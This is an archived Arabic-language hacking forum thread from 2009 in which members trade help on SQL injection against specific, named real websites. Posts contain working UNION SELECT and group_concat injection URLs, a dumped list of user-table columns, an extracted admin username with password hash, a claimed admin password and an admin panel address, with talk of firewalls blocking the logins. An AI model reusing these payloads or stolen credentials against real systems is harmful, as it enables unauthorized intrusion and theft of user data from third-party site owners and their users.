:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   مشكلة جننتني (http://www.vbspiders.com/vb/t23045.html)

iTaChi 12-18-2009 04:59 PM
مشكلة جننتني
 
السلام عليكم

كيفكم

احب اشكر الاخ فولكانو على افضل دورة تعليم حقن في العالم

انا واجهتني مشكلة ترفع الضغط في اكثر من 5 مواقع

وهي اني اطلع لوحة التحكم


واطلع اسم القاعدة وعمود الباسوورد وعمود اليوزر


في القاعدة 5 طبعا

لكن ما يطلع الباسورد واليوزر

يطلع لي خطأ


يا ليت تلقون لي حل

وهذا رابط احد المواقع


ادخلوا وشوفوا
http://www.snis.ch/news.php?ID=-15 UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat(user_id,0x3a,user_pass word),12+from+wikiuser--



بليز يا شباب دلوني للحل بسررعة

والله كنت متحمس بس تحطمت

ويا ليت يشوفي فولكانو حل لها



تحياتي

Death-Ghost 12-18-2009 05:35 PM
والله خيو انا كمان بتصير لي كتير

ناطرين جواب فلكانو :Great:

على فكره خيو هالموقع انا كنت شغال عليه بس ضاع مني لووووووووووووول :32:

Death-Ghost 12-18-2009 06:18 PM
وهاد كمان موقع صارت لي فيه نفس المشكله :088:

http://www.downtowncrossing.org/shop...4+from+admin--

اسم الادمن
1
الباسورد
dertg1

KaLa$nikoV 12-18-2009 06:43 PM
اوك شباب اعرفت المشكله يس المشكله اني مش بالبيت رح اشتغل فيهم ان شاء الله
اذا ما حد اعطاكم رد ارسلولي رساله ع الخاص بعد يومين لشان مشغول شويه (لمده يومين)

x-hacker 12-18-2009 06:46 PM
انتزروا راح اعمل لهم حقن ولي عودة بعد الحقن

x-hacker 12-18-2009 06:53 PM
افادة
 
اقتباس:
المشاركة الأصلية كتبت بواسطة xXsn!perXx (المشاركة 86668)
وهاد كمان موقع صارت لي فيه نفس المشكله :088:

http://www.downtowncrossing.org/shop...4+from+admin--

اسم الادمن
1
الباسورد
dertg1
اخي ليكن في علمك ان 1 مو نيم الادمن و انما هو رقم عضويته
في هده الحاله عليك ان تعمل امر group_concat
اللي عندو مشكل في الحقن
ايميلي في التوقيع :00001793[1]:

Death-Ghost 12-18-2009 06:54 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة VoLc4n0 (المشاركة 86677)
اوك شباب اعرفت المشكله يس المشكله اني مش بالبيت رح اشتغل فيهم ان شاء الله
اذا ما حد اعطاكم رد ارسلولي رساله ع الخاص بعد يومين لشان مشغول شويه (لمده يومين)

مشكورين فلكانو

ياريت لو لقيت طريقه تعطينا الحل في اسرع وقت :a04:

Death-Ghost 12-18-2009 06:55 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة x-hacker (المشاركة 86685)
اخي ليكن في علمك ان 1 مو نيم الادمن و انما هو رقم عضويته
في هده الحاله عليك ان تعمل امر group_concat
اللي عندو مشكل في الحقن
ايميلي في التوقيع :00001793[1]:
طيب خيو انا سويت Group_concat من البدايه وكل مره يطلع لي نفس الاشي

x-hacker 12-18-2009 07:08 PM
انت متاكد انك شفت دورة الاخ فولكانو
شوف درس اللي فيه امر
group_concat
شاهده

x-hacker 12-18-2009 07:12 PM
نتيجة الحقن هنا

Death-Ghost 12-18-2009 07:13 PM
يسلمو خيو :Great:

بس نفس الشي في غلط

خلاص انا بحل المشكله

iTaChi 12-18-2009 07:14 PM
يالله يا شباب وين الباقين

والله محتاج الحل بسررررعة

وين فريق كلاشنكوف بلييز
مساعدتكم

iTaChi 12-18-2009 07:15 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة x-hacker (المشاركة 86695)
نتيجة الحقن هنا
اخوي يعطيك العافيه

هذا مو الموقع اللي انا حطيته

على العموم مشكور على المساعدة

x-hacker 12-18-2009 07:25 PM
ربما ما رتبت الحقنة
 
اقتباس:
المشاركة الأصلية كتبت بواسطة xXsn!perXx (المشاركة 86696)
يسلمو خيو :Great:

بس نفس الشي في غلط

خلاص انا بحل المشكله
شكرا مو مشكلة ا
شوف هنا اخي انا اخرجت اليوزر و كلمة المرور
اضغط هنا

Death-Ghost 12-18-2009 09:00 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة x-hacker (المشاركة 86700)
شكرا مو مشكلة ا
شوف هنا اخي انا اخرجت اليوزر و كلمة المرور
اضغط هنا

طيب خيو وهاد رابط لوحه التحكم

http://www.downtowncrossing.org/admin

جرب اليوزر نييم والباسورد وراح تحصل ان ما بفوت معاك :)

x-hacker 12-18-2009 10:05 PM
نعم و الله هاي مشكلة كـــــــــــــــبيرة

x-hacker 12-18-2009 10:07 PM
جربت كل شي معاها و لكن ما نجحت
ربما هناك شي

Death-Ghost 12-19-2009 03:41 AM
مشكورين خيو وما قصرت:Great:

ناطرين رد فلكانو :)

KaLa$nikoV 12-19-2009 03:24 PM
اولا يمنع وضع استفسارين في موضوع واحد :@ ؟؟؟؟؟؟؟؟؟؟؟ متعبه تعمل لنفسك موضوع

الحق عليك يا هكر اكس
حسب القوانين لازم ما جاوبت اكس سنايبر

بالنسبه لموضوعنا الاساسي هو للاخ
iTaChi

اخي هنا يكون حمايه من السيرفر بعدم عرض جدول اليوزر
يعني حمايه من السيرفر نفسه لا اكثر ولا اقل (حقنك سليم 100% )
هناك شخص يدعي انه يستطيع تخطي هذه المشكله

لكنه محتكر الطريقه ويقول برايفت
وحال العرب بالبرايفت امرين (اما لا يعرف ويلعب معنا بالهياط)
او يعرف ولا يريد القول ونادرا تجد اشخاص هكذا
وانا احتقر اي شخص يقول برايفت لانه يرغب بالشهره لا اكثر والشهره بالاكتشاف والنشر لا بالهياط الفارغ


لاحظ التالي دليل على ان السيرفر مانع استعراض جدول يوزر


هنا الحقنه سليمه وهي غير محميه من السيرفر
لكنه لن يتعرف عليها

سابقى خلف امثال هذه المواقع حتى يتسنى لي معرفه حل باذن الله

iTaChi 12-19-2009 09:17 PM
يعطيك الف عافيه اخوي فولكانو

والله مقدر جهودك وانت اللي يفتخرون بك العرب مو اللي يقول لي برايفت

والله ما ذبحنا الا الهياط

الف شكر على المساعدة

Black-FoG 12-20-2009 06:24 PM
اظن مافي مشكلة يعني :


اسماء الاعمدة الي في الجدول :

wikiuser:user_id:swissinternationalstudiesch10,

wikiuser:user_name:swissinternationalstudiesch10,

wikiuser:user_real_name:swissinternationalstudiesc h10,

wikiuser:user_password:swissinternationalstudiesch10,

wikiuser:user_newpassword:swissinternationalstudie sch10,

wikiuser:user_newpass_time:swissinternationalstudi esch10,

wikiuser:user_email:swissinternationalstudiesch10,

wikiuser:user_options:swissinternationalstudiesch1 0,

wikiuser:user_touched:swissinternationalstudiesch1 0,

wikiuser:user_token:swissinternationalstudiesch10,

wikiuser:user_email_authenticated:swissinternation alstudiesch10,

wikiuser:user_email_token:swissinternationalstudie sch10

wikiuser:user_email_token_expires:swissinternation alstudiesch10,

wikiuser:user_registration:swissinternationalstudi esch10,

wikiuser:user_editcount:swissinternationalstudiesc h10


الحقنة هي هادي :

http://www.snis.ch/news.php?ID=-15+u...h10.wikiuser--

ونتيجة الحقنة هادي معلومات الادمن :

1:Admin::B:6d592e1d:0b4af4bd4656356f3a300be5f5d2cc 87


واتمنى اكون على صواب





Adioooos

Black-FoG 12-20-2009 06:27 PM
شوف الفرق وتعرف وين الخطأ ;)

iTaChi 12-21-2009 12:30 AM
شكرا حبيبي

والله فنان
يعني انت طلعتها بامر قروب كونكات صح ؟؟

marrak 12-24-2009 12:20 AM
الجواب صحيح اخي الفاضل
كود PHP:
http://www.snis.ch/news.php?ID=15+and+1=0+union+select+0,1,2,3,4,5,6,7,8,9,group_concat(user_name,0x3a,user_password),11+from+swissinternationalstudiesch10.wikiuser--&LG=2 

Black-FoG 12-24-2009 02:27 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة iTaChi (المشاركة 87303)
شكرا حبيبي

والله فنان
يعني انت طلعتها بامر قروب كونكات صح ؟؟

http://www.snis.ch/news.php?ID=15+an...h10.wikiuser--

انت كتبت الاسعلام ناقص



Adioooos

محب الهكر 12-24-2009 08:44 AM
اقتباس:

طيب خيو وهاد رابط لوحه التحكم

http://www.downtowncrossing.org/admin

جرب اليوزر نييم والباسورد وراح تحصل ان ما بفوت معاك
يا أبو الشباب هذا عليه جدار ناري ...والجدار الناري الباس واليوزر حقة بيختلف عن باسورد اللوحة ...يعني الحقن صحيح والملعومات صحيحة لكن هذه معلومات اللوحة بعد تجاوز الجدار الناري ...

وللعلم أسؤ اشي في الحقن الجدر النارية ...لانها تقتل الامل :(

Black-FoG 12-24-2009 07:02 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة محب الهكر (المشاركة 87513)
يا أبو الشباب هذا عليه جدار ناري ...والجدار الناري الباس واليوزر حقة بيختلف عن باسورد اللوحة ...يعني الحقن صحيح والملعومات صحيحة لكن هذه معلومات اللوحة بعد تجاوز الجدار الناري ...

وللعلم أسؤ اشي في الحقن الجدر النارية ...لانها تقتل الامل :(

وانا اخوك اظن انكم تتكلمون عن الموقع هدا http://www.snis.ch/ مو الي كاتب انت ولا انا غلطان ؟؟؟



Adioooos

محب الهكر 12-25-2009 12:24 PM
اقتباس:
وانا اخوك اظن انكم تتكلمون عن الموقع هدا http://www.snis.ch/ مو الي كاتب انت ولا انا غلطان ؟؟؟
الموقعين عليهم جدر نارية :)


الساعة الآن 08:39 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0